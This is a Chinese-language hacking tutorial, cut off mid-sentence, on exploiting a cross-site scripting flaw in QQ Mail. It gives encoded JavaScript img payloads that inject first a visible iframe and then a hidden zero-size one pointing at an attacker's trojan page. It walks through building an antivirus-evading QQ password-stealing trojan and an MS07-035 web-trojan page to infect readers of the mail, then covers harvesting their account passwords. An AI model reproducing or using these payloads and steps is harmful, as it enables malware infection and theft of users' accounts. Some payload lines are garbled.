QQ邮件中的木马.docVIP

QQ邮件中的木马 　　相信大家经常收到一些莫名其妙的邮件和贺卡，让你看一段视频了什么的，这只是垃圾邮件吗?每次我看到这些邮件，都毫不犹豫的将其删除，绝对不打开查看――因为，这些看似无关紧要的邮件中，很可能就夹带着木马! 　　 　　QQ邮箱漏洞与木马传播 　　 　　在新版的QQ邮箱中，存在着一个很严重的挂马漏洞，恶意攻击者可以在邮件中输入恶意代码。让其他用户中招后台下载运行木马。 　　与一般的邮箱挂马漏洞不同，一般的邮箱中即使收到了木马邮件，但是普通用户可能一个月也难上去收两次邮件，因此中招几率很小。但是由于QQ的用户非常多，而且QQ邮箱收到新邮件之后，会在QQ上弹出提示，大部分用户都会点击新邮件提示，自动打开查看邮件而中招的。而且QQ邮箱中提供了QQ群发邮件功能，发一封邮件。可能导致群中80％以上的人都中木马!因此QQ邮箱挂马漏洞，其危害是十分的严重! 　　 　　QQ邮箱挂马漏洞测试 　　 　　QQ邮箱挂马漏洞出现的原因，是由于QQ邮箱提供了HTML邮件编写功能，同时未对跨站代码进行过滤，因此造成攻击者可在邮件中写入网页木马挂马代码。我们先来进行一下小测试： 　　打开QQ邮箱。点击左侧的“写信”链接，打开新邮件撰写页面，收件人写上自己的QQ邮箱。然后在邮件正文窗口中。随便输入一些内容，再点击上方的“显示工具条”按钮，显示邮件工具栏按钮。点击其上的“HTML”按钮，将邮件撰写切换到HTML邮件代码编写方式。在代码段最后输入如下代码： 　　(img src=#x6A#x61#x76#x61#x73#x63#x72#x69#x70#x74#x3A#x64ocument#x2ewrite#x28#x27#x3clframe％20src=％20width=500％20height=550％3E#x3c/iframe％3E)) 　　输入代码完毕后，直接点击“发送”按钮，即可将邮件发送出去。 　　发送邮件后，点击“返回收件箱”按钮，回到收件箱中接收新邮件。点击接收到的邮件。打开后将会看到邮件中嵌入了网页框架，其中显示的是百度首页的内容。可见输入的代码被执行了。 　　 　　盗号攻击实例 　　 　　如果我们将上面邮件中显示的百度网页，改为其它木马网页，那么就达到了挂马的目的。还可对代码进行修改，隐藏网页框架，使别人根本看不出任何异样，即在无声无息中中马了!下面我们以制作网马。盗取QQ号攻击为倒，讲解详细的过程： 　　步骤一：生成盗号木马 　　QQ盗号木马很多，这里以最新发布的“vvQQ大盗发布版”进行测试。vvQQ大盗发布版作了各种常用杀毒软件的免杀版本，可以躲过大部分的杀毒软件，而且该木马还可避过QQ医生，使QQ自带杀毒功能无效。木马提供了多种收集方式，不会出现收不到号的情况。 　　运行vvQQ大盗发布版程序后，首先选择收信方式，可选择邮箱收信，也可以选择ASP或PHP网页收信，具体设置方法与以前介绍过的盗Q木马差不多。在右边可勾选“下载者列表”项，在窗口列表中输入木马运行后同时下载运行的其它木马程序网址。在“其它选项”中，可勾选设置获取QQ号上的Q币数量、显示对方地理位置与lP等。为保证木马运行隐蔽性，可选择运行后“立即删除自身”；选择“首次运行60秒后关闭QQ”，将自动关闭QQ，让用户重新登录以盗取QQ号密码。 　　最后点击“选择木马图标”，为木马程序设置一个伪装图标，点击“生成木马”，即可得到一个免杀的盗Q木马程序了。将生成的木马程序上传到刚才申请的网站空间中，得到一个木马链接地址。 　　步骤二：制作网页木马 　　系统未打相应的漏洞补丁，是网页木马成功执行的关键，这里我们用最新的MS07035漏洞制作网页木马。 　　运行“卫国红客最新MS07035漏洞网马生成器”，点击界面中的“网马”按钮。打开网马生成框。可勾选所有的设置项，这样生成的网页木马可针对最近所有的新漏洞系统，包括键盘溢出、ANI、MS07027等多个漏洞。在中间的输入框中，输入刚才的木马链接地址。设置完毕后，点击“生成”按钮，即可在程序目录下生成一个名为“1.js”的网页文件。将后缀名改为“html”，然后上传到网站空间中，得到一个网页木马地址，假设为“/muma.html”。 　　步骤三：伪装QQ邮件代码 　　前面测试时，QQ邮件挂马代码是经过加密的，其效果是在QQ收信阅读页面中嵌入一个百度网页框架。现在我们要将框架隐藏，并将网页指向上传的网页木马地址，因此将代码改为如下： 　　(IMG src=javascript:document.write(lframe％20src=http://puxiao /muma.html％20width=O％20height=0％3E/iframe％3E)) 　　具体使用时，更改其